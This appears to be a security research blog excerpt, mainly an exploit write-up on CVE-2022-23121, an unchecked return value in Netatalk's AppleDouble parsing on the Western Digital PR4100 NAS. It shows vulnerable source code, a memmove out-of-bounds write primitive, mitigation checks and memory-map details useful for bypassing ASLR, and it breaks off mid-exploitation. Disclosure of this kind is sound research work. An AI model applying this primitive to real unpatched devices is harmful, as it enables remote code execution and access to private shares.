We hope this dataset and Python library will be helpful to the community as it is for us and are eager to see what kind of exciting things people will come up with or find using the data and tooling. What we have shown in this blog is only the tip of the iceberg of what you can uncover from beacon data.

Some ideas for the readers:

  • Cluster beacon and C2 profile features using a clustering algorithm such as DBSCAN.
  • Improve the classification of malicious beacons. You can find the current classification method in our notebook.
  • Use the GeoIP ASN data to determine where the most malicious beacons are hosted.
  • Analysis on the x509 certificate data, such as self-signed or not.
  • Determine if a beacon uses domain fronting and which CDN.

All the statistics shown in this blog post can also be found in our accompanying Jupyter notebook including some more statistics and overviews not shown in this blog.

We also want to thank Rapid7 for the Open Data sets, without this data the beacon dataset would be far less complete!

Final links for convenience:

Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)

24 March 2022 at 13:13
Mooncake Exploit

Summary

This blog post describes an unchecked return value vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021 when targeting the Western Digital PR4100. Western Digital published a firmware update (5.19.117) which entirely removed support for the open source third party vulnerable service "Depreciated Netatalk Service". As this vulnerability was addressed in the upstream Netatalk code, CVE-2022-23121 was assigned and a ZDI advisory published together with a new Netatalk release 3.1.13 distributed which fixed this vulnerability together with a number of others.

Introduction

The vulnerability is in the Netatalk project, which is an open-source implementation of the Apple Filing Protocol (AFP). The Netatalk code is implemented in the /usr/sbin/afpd service and the /lib64/libatalk.so library. The afpd service is running by default on the Western Digital My Cloud Pro Series PR4100 NAS.

This vulnerability can be exploited remotely and does not need authentication. It allows an attacker to get remote code execution as the nobody user on the NAS. This user can access private shares that would normally require authentication.

We have analysed and exploited the vulnerability on the 5.17.107 version, which we detail below but older versions are likely vulnerable too.

Note: The Western Digital My Cloud Pro Series PR4100 NAS is based on the x86_64 architecture.

We have named our exploit "Mooncake". This is because we finished writing our exploit on the 21st September 2021, which happens to be the day of the Mid-Autumn Festival a.k.a Mooncake festival in 2021.

Vulnerability details

Background

DSI / AFP protocols

The Apple Filing Protocol (AFP) is an alternative to the well known Server Message Block (SMB) protocol to share files over the network. The AFP specification can be found here.

AFP is transmitted over the Data Stream Interface (DSI) protocol, itself transmitted over TCP/IP, on TCP port 548.

However, SMB seems to have won the file sharing network protocols battle and AFP is less known, even if still supported in devices such as NAS. The AFP protocol was deprecated in OS X 10.9 and AFP server was removed in OS X 11.

Netatalk

The Netatalk project is an implementation of AFP/DSI for UNIX platforms that was moved to SourceForge in 2000. Its original purposes was to allow UNIX-like operating systems to serve as AFP servers for many Macintosh / OS X clients.

As detailed earlier, AFP is getting less and less interest. This is reflected in the Netatalk project too. The latest Netatalk’s stable release (3.1.12) was released in December 2018 which makes it a rather deprecated and unsupported project.

The Netatalk project was vulnerable to the CVE-2018-1160 vulnerability which was an out-of-bounds write in the DSIOpensession command (dsi_opensession()) in Netatalk < 3.1.12. This was successfully exploited on Seagate NAS due to no ASLR and later on environments with ASLR as part of the Hitcon 2019 CTF challenge.

AppleDouble file format

The AppleSingle and AppleDouble file formats aim to store regular files’ metadata and allows sharing that information between different filesystems without having to worry about interoperability.

The main idea is based on the fact that any filesystem allows to store files as a series of bytes. So it is possible to save regular files’ metadata (a.k.a attributes) into additional files along the regular files and reflect these attributes back to the other end (or at least some of them) if the other end’s filesystem supports them. Otherwise, the additional attributes can be discarded.

The AppleSingle and AppleDouble specification can be found here. The AppleDouble file format is also explained in the samba source code with this diagram:

/*
   "._" AppleDouble Header File Layout:
         MAGIC          0x00051607
         VERSION        0x00020000
         FILLER         0
         COUNT          2
     .-- AD ENTRY[0]    Finder Info Entry (must be first)
  .--+-- AD ENTRY[1]    Resource Fork Entry (must be last)
  |  |   /////////////
  |  '-> FINDER INFO    Fixed Size Data (32 Bytes)
  |      ~~~~~~~~~~~~~  2 Bytes Padding
  |      EXT ATTR HDR   Fixed Size Data (36 Bytes)
  |      /////////////
  |      ATTR ENTRY[0] --.
  |      ATTR ENTRY[1] --+--.
  |      ATTR ENTRY[2] --+--+--.
  |         ...          |  |  |
  |      ATTR ENTRY[N] --+--+--+--.
  |      ATTR DATA 0   <-'  |  |  |
  |      ////////////       |  |  |
  |      ATTR DATA 1   <----'  |  |
  |      /////////////         |  |
  |      ATTR DATA 2   <-------'  |
  |      /////////////            |
  |         ...                   |
  |      ATTR DATA N   <----------'
  |      /////////////
  |         ...          Attribute Free Space
  |
  '----> RESOURCE FORK
            ...          Variable Sized Data
            ...
*/

The afpd binary and libatalk.so library don’t have symbols. However, Western Digital published the Netatalk open-source based implementation they used, as well as the patches they implemented in here due to the GNU General Public License (GPL). The latest source code archive Western Digital published was for version 5.16.105 and does not match the latest version analysed (5.17.107). However, we have confirmed that afpd and netatalk.so have never been modified in all OS 5 versions so far. Consequently, the code shown below is generally refering to the Netatalk source code.

NOTE: Western Digital PR4100 uses the latest 3.1.12 netatalk source code as a base.

Let’s analyse how the netatalk code accepts client connections, parses AFP requests to reach the vulnerable code when dealing with opening fork files stored in the AppleDouble file format.

The main() entry point function initialises lots of objects in memory, loads the AFP configuration, and starts listening on the AFP port (TCP 548).

//netatalk-3.1.12/etc/afpd/main.c
int main(int ac, char **av)
{
    ...
    /* wait for an appleshare connection. parent remains in the loop
     * while the children get handled by afp_over_{asp,dsi}.  this is
     * currently vulnerable to a denial-of-service attack if a
     * connection is made without an actual login attempt being made
     * afterwards. establishing timeouts for logins is a possible
     * solution. */
    while (1) {
        ...
        for (int i = 0; i < asev->used; i++) {
            if (asev->fdset[i].revents & (POLLIN | POLLERR | POLLHUP | POLLNVAL)) {
                switch (asev->data[i].fdtype) {

                case LISTEN_FD:
                    if ((child = dsi_start(&obj, (DSI *)(asev->data[i].private), server_children))) {
                        ...
                    }
                    break;
    ...
```

The dsi_start() function basically calls into 2 functions: dsi_getsession() and afp_over_dsi().

//netatalk-3.1.12/etc/afpd/main.c
static afp_child_t *dsi_start(AFPObj *obj, DSI *dsi, server_child_t *server_children)
{
    afp_child_t *child = NULL;

    if (dsi_getsession(dsi, server_children, obj->options.tickleval, &child) != 0) {
        LOG(log_error, logtype_afpd, "dsi_start: session error: %s", strerror(errno));
        return NULL;
    }

    /* we've forked. */
    if (child == NULL) {
        configfree(obj, dsi);
        afp_over_dsi(obj); /* start a session */
        exit (0);
    }

    return child;
}

The dsi_getsession() calls into a dsi->proto_open function pointer which is dsi_tcp_open():

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */

The dsi_tcp_open() function accepts a client connection, creates a subprocess with fork() and starts initialising the DSI session with the client.

Teaser: That will be useful for exploitation.

/* accept the socket and do a little sanity checking */
static pid_t dsi_tcp_open(DSI *dsi)
{
    pid_t pid;
    SOCKLEN_T len;

    len = sizeof(dsi->client);
    dsi->socket = accept(dsi->serversock, (struct sockaddr *) &dsi->client, &len);
    ...
   if (0 == (pid = fork()) ) { /* child */
        ...
    }

    /* send back our pid */
    return pid;
}

Back into dsi_getsession(), the parent afpd sets *childp != NULL whereas the forked child afpd handling the client connection sets *childp == NULL

//netatalk-3.1.12/libatalk/dsi/dsi_getsess.c
/*!
 * Start a DSI session, fork an afpd process
 *
 * @param childp    (w) after fork: parent return pointer to child, child returns NULL
 * @returns             0 on sucess, any other value denotes failure
 */
int dsi_getsession(DSI *dsi, server_child_t *serv_children, int tickleval, afp_child_t **childp)
{
  ...
  switch (pid = dsi->proto_open(dsi)) { /* in libatalk/dsi/dsi_tcp.c */
  case -1:
    /* if we fail, just return. it might work later */
    LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
    return -1;

  case 0: /* child. mostly handled below. */
    break;

  default: /* parent */
    /* using SIGKILL is hokey, but the child might not have
     * re-established its signal handler for SIGTERM yet. */
    close(ipc_fds[1]);
    if ((child = server_child_add(serv_children, pid, ipc_fds[0])) ==  NULL) {
      LOG(log_error, logtype_dsi, "dsi_getsess: %s", strerror(errno));
      close(ipc_fds[0]);
      dsi->header.dsi_flags = DSIFL_REPLY;
      dsi->header.dsi_data.dsi_code = htonl(DSIERR_SERVBUSY);
      dsi_send(dsi);
      dsi->header.dsi_data.dsi_code = DSIERR_OK;
      kill(pid, SIGKILL);
    }
    dsi->proto_close(dsi);
    *childp = child;
    return 0;
  }
  ...
  switch (dsi->header.dsi_command) {
  ...
  case DSIFUNC_OPEN: /* setup session */
    /* set up the tickle timer */
    dsi->timer.it_interval.tv_sec = dsi->timer.it_value.tv_sec = tickleval;
    dsi->timer.it_interval.tv_usec = dsi->timer.it_value.tv_usec = 0;
    dsi_opensession(dsi);
    *childp = NULL;
    return 0;

  default: /* just close */
    LOG(log_info, logtype_dsi, "DSIUnknown %d", dsi->header.dsi_command);
    dsi->proto_close(dsi);
    exit(EXITERR_CLNT);
  }
}

We are now back into dsi_start(). For the parent, nothing happens and the main() forever loop continues waiting for other client connections. For the child handling the connection, afp_over_dsi() is called. This function reads the AFP packet (which is the DSI payload), determines the AFP command and calls a function pointer inside the afp_switch[] global array to handle that AFP command.

//netatalk-3.1.12/etc/afpd/afp_dsi.c
/* -------------------------------------------
 afp over dsi. this never returns.
*/
void afp_over_dsi(AFPObj *obj)
{
    ...
    /* get stuck here until the end */
    while (1) {
        ...
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        ...
        switch(cmd) {
        ...
        case DSIFUNC_CMD:
            ...
                /* send off an afp command. in a couple cases, we take advantage
                 * of the fact that we're a stream-based protocol. */
                if (afp_switch[function]) {
                    dsi->datalen = DSI_DATASIZ;
                    dsi->flags |= DSI_RUNNING;

                    LOG(log_debug, logtype_afpd, "<== Start AFP command: %s", AfpNum2name(function));

                    AFP_AFPFUNC_START(function, (char *)AfpNum2name(function));
                    err = (*afp_switch[function])(obj,
                                                  (char *)dsi->commands, dsi->cmdlen,
                                                  (char *)&dsi->data, &dsi->datalen);

The afp_switch[] global array is initialized to the preauth_switch value initially which consists of only a few handlers available pre-authentication. We can guess it is set to the postauth_switch value once the client is authenticated. This gives access to a lot of other AFP features.

//netatalk-3.1.12/etc/afpd/switch.c
/*
 * Routines marked "NULL" are not AFP functions.
 * Routines marked "afp_null" are AFP functions
 * which are not yet implemented. A fine line...
 */
static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,				/*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  32 -  39 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  40 -  47 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,					/*  48 -  55 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, afp_login_ext,				/*  56 -  63 */
    ...
};

AFPCmd *afp_switch = preauth_switch;

AFPCmd postauth_switch[] = {
    NULL, afp_bytelock, afp_closevol, afp_closedir,
    afp_closefork, afp_copyfile, afp_createdir, afp_createfile,	/*   0 -   7 */
    afp_delete, afp_enumerate, afp_flush, afp_flushfork,
    afp_null, afp_null, afp_getforkparams, afp_getsrvrinfo,	/*   8 -  15 */
    afp_getsrvrparms, afp_getvolparams, afp_login, afp_logincont,
    afp_logout, afp_mapid, afp_mapname, afp_moveandrename,	/*  16 -  23 */
    afp_openvol, afp_opendir, afp_openfork, afp_read,
    afp_rename, afp_setdirparams, afp_setfilparams, afp_setforkparams,
    /*  24 -  31 */
    afp_setvolparams, afp_write, afp_getfildirparams, afp_setfildirparams,
    afp_changepw, afp_getuserinfo, afp_getsrvrmesg, afp_createid, /*  32 -  39 */
    afp_deleteid, afp_resolveid, afp_exchangefiles, afp_catsearch,
    afp_null, afp_null, afp_null, afp_null,			/*  40 -  47 */
    afp_opendt, afp_closedt, afp_null, afp_geticon,
    afp_geticoninfo, afp_addappl, afp_rmvappl, afp_getappl,	/*  48 -  55 */
    afp_addcomment, afp_rmvcomment, afp_getcomment, NULL,
    ...
};

Here it is interesting to note that the Western Digital PR4100 has a Public AFP share by default which is available without requiring user authentication. This means we can reach all these post-authentication handlers as long as we target the Public share. It is also worth mentioning that the same Public share is available over the Server Message Block (SMB) protocol to the guest user, without requiring any password. It means we can read / create / modify any files over AFP or SMB as long as they are stored in the Public share.

The AFP command we are interested in is "FPOpenFork", which is handled by the afp_openfork() handler. As detailed previously, a fork file is a special type of file used to store metadata associated with a regular file. The fork file is stored in the AppleDouble file format. The afp_openfork() handler finds the volume and fork file path to open and call ad_open() ("ad" stands for AppleDouble).

//netatalk-3.1.12/etc/afpd/fork.c
/* ----------------------- */
int afp_openfork(AFPObj *obj _U_, char *ibuf, size_t ibuflen _U_, char *rbuf, size_t *rbuflen)
{
    ...
    struct adouble  *adsame = NULL;
    ...
    if ((opened = of_findname(vol, s_path))) {
        adsame = opened->of_ad;
    }
    ...
    if ((ofork = of_alloc(vol, curdir, path, &ofrefnum, eid, adsame, st)) == NULL)
        return AFPERR_NFILE;
    ...
    /* First ad_open(), opens data or ressource fork */
    if (ad_open(ofork->of_ad, upath, adflags, 0666) < 0) {

The ad_open() function is quite generic in that it can open different fork files: a data fork file, a metadata fork file or a resource fork file. Since we are dealing with a resource fork here, we end up calling ad_open_rf() ("rf" stands for resource fork).

NOTE: ad_open() is in libatalk/ folder instead of etc/afpd for the previously discussed code. Consequently, the code we analyse from now on is in libatalk.so.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open data-, metadata(header)- or ressource fork
 *
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags)
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags, mode_t mode)
 *
 * You must call ad_init() before ad_open, usually you'll just call it like this: \n
 * @code
 *      struct adoube ad;
 *      ad_init(&ad, vol->v_adouble, vol->v_ad_options);
 * @endcode
 *
 * Open a files data fork, metadata fork or ressource fork.
 *
 * @param ad        (rw) pointer to struct adouble
 * @param path      (r)  Path to file or directory
 * @param adflags   (r)  Flags specifying which fork to open, can be or'd:
 *                         ADFLAGS_DF:        open data fork
 *                         ADFLAGS_RF:        open ressource fork
 *                         ADFLAGS_HF:        open header (metadata) file
 *                         ADFLAGS_NOHF:      it's not an error if header file couldn't be opened
 *                         ADFLAGS_NORF:      it's not an error if reso fork couldn't be opened
 *                         ADFLAGS_DIR:       if path is a directory you MUST or ADFLAGS_DIR to adflags
 *
 *                       Access mode for the forks:
 *                         ADFLAGS_RDONLY:    open read only
 *                         ADFLAGS_RDWR:      open read write
 *
 *                       Creation flags:
 *                         ADFLAGS_CREATE:    create if not existing
 *                         ADFLAGS_TRUNC:     truncate
 *
 *                       Special flags:
 *                         ADFLAGS_CHECK_OF:  check for open forks from us and other afpd's
 *                         ADFLAGS_SETSHRMD:  this adouble struct will be used to set sharemode locks.
 *                                            This basically results in the files being opened RW instead of RDONLY.
 * @param mode      (r)  mode used with O_CREATE
 *
 * The open mode flags (rw vs ro) have to take into account all the following requirements:
 * - we remember open fds for files because me must avoid a single close releasing fcntl locks for other
 *   fds of the same file
 *
 * BUGS:
 *
 * * on Solaris (HAVE_EAFD) ADFLAGS_RF doesn't work without
 *   ADFLAGS_HF, because it checks whether ad_meta_fileno() is already
 *   openend. As a workaround pass ADFLAGS_SETSHRMD.
 *
 * @returns 0 on success, any other value indicates an error
 */
int ad_open(struct adouble *ad, const char *path, int adflags, ...)
{
    ...
    if (adflags & ADFLAGS_RF) {
        if (ad_open_rf(path, adflags, mode, ad) != 0) {
            EC_FAIL;
        }
    }

ad_open_rf() then calls into ad_open_rf_ea():

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open ressource fork
 */
static int ad_open_rf(const char *path, int adflags, int mode, struct adouble *ad)
{
    int ret = 0;

    switch (ad->ad_vers) {
    case AD_VERSION2:
        ret = ad_open_rf_v2(path, adflags, mode, ad);
        break;
    case AD_VERSION_EA:
        ret = ad_open_rf_ea(path, adflags, mode, ad);
        break;
    default:
        ret = -1;
        break;
    }

    return ret;
}

The ad_open_rf_ea() function opens the resource fork file. Assuming the file already exists, it ends up calling into ad_header_read_osx() to read the actual content, which is in the AppleDouble format:

static int ad_open_rf_ea(const char *path, int adflags, int mode, struct adouble *ad)
{
    ...

#ifdef HAVE_EAFD
    ...
#else
    EC_NULL_LOG( rfpath = ad->ad_ops->ad_path(path, adflags) );
    if ((ad_reso_fileno(ad) = open(rfpath, oflags)) == -1) {
        ...
    }
#endif
    opened = 1;
    ad->ad_rfp->adf_refcount = 1;
    ad->ad_rfp->adf_flags = oflags;
    ad->ad_reso_refcount++;

#ifndef HAVE_EAFD
    EC_ZERO_LOG( fstat(ad_reso_fileno(ad), &st) );
    if (ad->ad_rfp->adf_flags & O_CREAT) {
        /* This is a new adouble header file, create it */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, initializing: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( new_ad_header(ad, path, NULL, adflags) );
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, flushing: \"%s\"",
            path, rfpath);
        ad_flush(ad);
    } else {
        /* Read the adouble header */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): reading adouble rfork: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( ad_header_read_osx(rfpath, ad, &st) );
    }
#endif

We have finally reached our vulnerable function: ad_header_read_osx().

Understanding the vulnerability

The ad_header_read_osx() reads the content of the resource fork i.e. interprets it in the AppleDouble file format. Netatalk stores elements of the AppleDouble file format inside its own adouble structure that we will detail soon. ad_header_read_osx() starts by reading the AppleDouble header to determine how many entries there are.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/* Read an ._ file, only uses the resofork, finderinfo is taken from EA */
static int ad_header_read_osx(const char *path, struct adouble *ad, const struct stat *hst)
{
    ...
    struct adouble      adosx;
    ...
    LOG(log_debug, logtype_ad, "ad_header_read_osx: %s", path ? fullpathname(path) : "");
    ad_init_old(&adosx, AD_VERSION_EA, ad->ad_options);
    buf = &adosx.ad_data[0];
    memset(buf, 0, sizeof(adosx.ad_data));
    adosx.ad_rfp->adf_fd = ad_reso_fileno(ad);

    /* read the header */
    EC_NEG1( header_len = adf_pread(ad->ad_rfp, buf, AD_DATASZ_OSX, 0) );
    ...
    memcpy(&adosx.ad_magic, buf, sizeof(adosx.ad_magic));
    memcpy(&adosx.ad_version, buf + ADEDOFF_VERSION, sizeof(adosx.ad_version));
    adosx.ad_magic = ntohl(adosx.ad_magic);
    adosx.ad_version = ntohl(adosx.ad_version);
    ...
    memcpy(&nentries, buf + ADEDOFF_NENTRIES, sizeof( nentries ));
    nentries = ntohs(nentries);
    len = nentries * AD_ENTRY_LEN;

Then we see it calls into parse_entries() to parse the different AppleDouble entries. What is interesting below is that if parse_entries() fails, it logs an error but does not exit.

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

If we look closer at parse_entries(), we see that it sets an error if one of the following condition occurs:

  • The AppleDouble "eid" is zero
  • The AppleDouble "offset" is out of bound
  • When the "eid" does not refer to a resource fork if the AppleDouble "offset" added to the length of the data is out of bound

We know we are dealing with resource forks, so the second condition is interesting. In short, it means we can provide an out of bound AppleDouble "offset" and parse_entries() returns an error, but ad_header_read_osx() ignores that error and continues processing.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Read an AppleDouble buffer, returns 0 on success, -1 if an entry was malformatted
 **/
static int parse_entries(struct adouble *ad, char *buf, uint16_t nentries)
{
    uint32_t   eid, len, off;
    int        ret = 0;

    /* now, read in the entry bits */
    for (; nentries > 0; nentries-- ) {
        memcpy(&eid, buf, sizeof( eid ));
        eid = get_eid(ntohl(eid));
        buf += sizeof( eid );
        memcpy(&off, buf, sizeof( off ));
        off = ntohl( off );
        buf += sizeof( off );
        memcpy(&len, buf, sizeof( len ));
        len = ntohl( len );
        buf += sizeof( len );

        ad->ad_eid[eid].ade_off = off;
        ad->ad_eid[eid].ade_len = len;

        if (!eid
            || eid > ADEID_MAX
            || off >= sizeof(ad->ad_data)
            || ((eid != ADEID_RFORK) && (off + len >  sizeof(ad->ad_data))))
        {
            ret = -1;
            LOG(log_warning, logtype_ad, "parse_entries: bogus eid: %u, off: %u, len: %u",
                (uint)eid, (uint)off, (uint)len);
        }
    }

    return ret;
}

From here, it is useful to know what mitigations are in place to know what we are going to need to bypass and also analyse the code after parse_entries() returns to know what kind of exploitation primitives we can build.

Exploitation

Mitigations in place

Checking the ASLR settings of the kernel:

[email protected]yCloudPR4100 ~ # cat /proc/sys/kernel/randomize_va_space 
2

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the afpd binary using checksec.py:

[*] '/home/cedric/pwn2own/firmware/wd_pr4100/_WDMyCloudPR4100_5.17.107_prod.bin.extracted/squashfs-root/usr/sbin/afpd'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

So to summarize:

  • afpd: randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: randomized
  • Stack: randomized

Since everything is randomized, we are going to need some kind of leak primitive to bypass ASLR. We still need to investigate if we can trigger a path where an out of bound offset access is useful for exploitation.

Finding good exploitation primitives

Let’s analyse the code in ad_header_read_osx() again. Let’s assume the previously discussed parse_entries() function parses an AppleDouble file where some entries can have offsets pointing out of bound. Let’s see what we can do after parse_entries() returns. We see that assuming the if (ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI) { condition passes, it ends up calling into ad_convert_osx().

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

    if (ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI) {
        LOG(log_warning, logtype_ad, "Convert OS X to Netatalk AppleDouble: %s",
            path ? fullpathname(path) : "");

        if (retry_read > 0) {
            LOG(log_error, logtype_ad, "ad_header_read_osx: %s, giving up", path ? fullpathname(path) : "");
            errno = EIO;
            EC_FAIL;
        }
        retry_read++;
        if (ad_convert_osx(path, &adosx) == 1) {
            goto reread;
        }
        errno = EIO;
        EC_FAIL;
    }

As the comment below states, the ad_convert_osx() function is responsible for converting the Apple’s AppleDouble file format to a simplified version of the format that is implemented in Netatalk.

We see that the ad_convert_osx() function starts by mapping the original fork file (in the AppleDouble file format) in memory. Then it calls memmove() to discard the FinderInfo part and to move the rest on top of it.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

Here it is time to look at the adouble structure. The important fields for us are ad_eid[] and ad_data[]. The adouble structure was already populated when the AppleDouble file was read. So we control all these fields.

//netatalk-3.1.12/include/atalk/adouble.h
struct ad_entry {
    off_t     ade_off;
    ssize_t   ade_len;
};

struct adouble {
    uint32_t            ad_magic;         /* Official adouble magic                   */
    uint32_t            ad_version;       /* Official adouble version number          */
    char                ad_filler[16];
    struct ad_entry     ad_eid[ADEID_MAX];

    ...
    char                ad_data[AD_DATASZ_MAX];
};

The functions/macros used to access the EID offset or length fields, as well as the data content are pretty self explanatory:

  • ad_getentryoff(): get an EID offset value
  • ad_getentrylen(): get an EID length value
  • ad_entry(): get the data associated with an EID (by retrieving it from the above offset)
//netatalk-3.1.12/libatalk/adouble/ad_open.c
off_t ad_getentryoff(const struct adouble *ad, int eid)
{
    if (ad->ad_vers == AD_VERSION2)
        return ad->ad_eid[eid].ade_off;

    switch (eid) {
    case ADEID_DFORK:
        return 0;
    case ADEID_RFORK:
#ifdef HAVE_EAFD
        return 0;
#else
        return ad->ad_eid[eid].ade_off;
#endif
    default:
        return ad->ad_eid[eid].ade_off;
    }
    /* deadc0de */
    AFP_PANIC("What am I doing here?");
}
//netatalk-3.1.12/include/atalk/adouble.h
#define ad_getentrylen(ad,eid)     ((ad)->ad_eid[(eid)].ade_len)
#define ad_setentrylen(ad,eid,len) ((ad)->ad_eid[(eid)].ade_len = (len))
#define ad_setentryoff(ad,eid,off) ((ad)->ad_eid[(eid)].ade_off = (off))
#define ad_entry(ad,eid)           ((caddr_t)(ad)->ad_data + (ad)->ad_eid[(eid)].ade_off)

So we control all the fields in the AppleDouble file format. More precisely, we know we can craft an invalid EID "offset" for all the entries we need, due to the previously discussed parse_entries() unchecked return value. Moreover, we can craft a resource fork of the size we want by having larger data. This means we can effectively control the source, destination and length of the memmove() call to write data we control outside of the memory mapping.

NOTE: the entries we want to target are ADEID_FINDERI and ADEID_RFORK:

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

The next question that comes to mind is where does the memory mapping gets mapped?

From testing, it turns out that if the fork file is less than 0x1000 bytes, the mapped file is allocated in quite high addresses before uams_pam.so, uams_guest.so and ld-2.28.so mappings. More precisely, the ld-2.28.so mapping is always 0xC000 bytes after the beginning of the mapped file, even if ASLR is in place:

(gdb) info proc mappings 
process 26343
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x5579bb534000     0x5579bb53d000     0x9000        0x0 /usr/local/modules/usr/sbin/afpd
      0x5579bb53d000     0x5579bb571000    0x34000     0x9000 /usr/local/modules/usr/sbin/afpd
      0x5579bb571000     0x5579bb57c000     0xb000    0x3d000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57c000     0x5579bb57d000     0x1000    0x47000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57d000     0x5579bb580000     0x3000    0x48000 /usr/local/modules/usr/sbin/afpd
      0x5579bb580000     0x5579bb5a0000    0x20000        0x0 
      0x5579bcd51000     0x5579bcd72000    0x21000        0x0 [heap]
      0x5579bcd72000     0x5579bcd92000    0x20000        0x0 [heap]
      0x7f6c56e30000     0x7f6c56eb0000    0x80000        0x0 
      ...
      0x7f6c57e02000     0x7f6c57e24000    0x22000        0x0 /lib/libc-2.28.so
      0x7f6c57e24000     0x7f6c57f6c000   0x148000    0x22000 /lib/libc-2.28.so
      0x7f6c57f6c000     0x7f6c57fb8000    0x4c000   0x16a000 /lib/libc-2.28.so
      0x7f6c57fb8000     0x7f6c57fb9000     0x1000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fb9000     0x7f6c57fbd000     0x4000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fbd000     0x7f6c57fbf000     0x2000   0x1ba000 /lib/libc-2.28.so
      ...
      0x7f6c58129000     0x7f6c58134000     0xb000        0x0 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58134000     0x7f6c58177000    0x43000     0xb000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58177000     0x7f6c58191000    0x1a000    0x4e000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58191000     0x7f6c58192000     0x1000    0x67000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58192000     0x7f6c58194000     0x2000    0x68000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58194000     0x7f6c581b1000    0x1d000        0x0 
      0x7f6c581b2000     0x7f6c581b3000     0x1000        0x0 /mnt/HD/HD_a2/Public/edg/._mooncake
      0x7f6c581b3000     0x7f6c581b4000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b4000     0x7f6c581b6000     0x2000     0x1000 /usr/local/modules/lib/netatalk/uams_pam.so
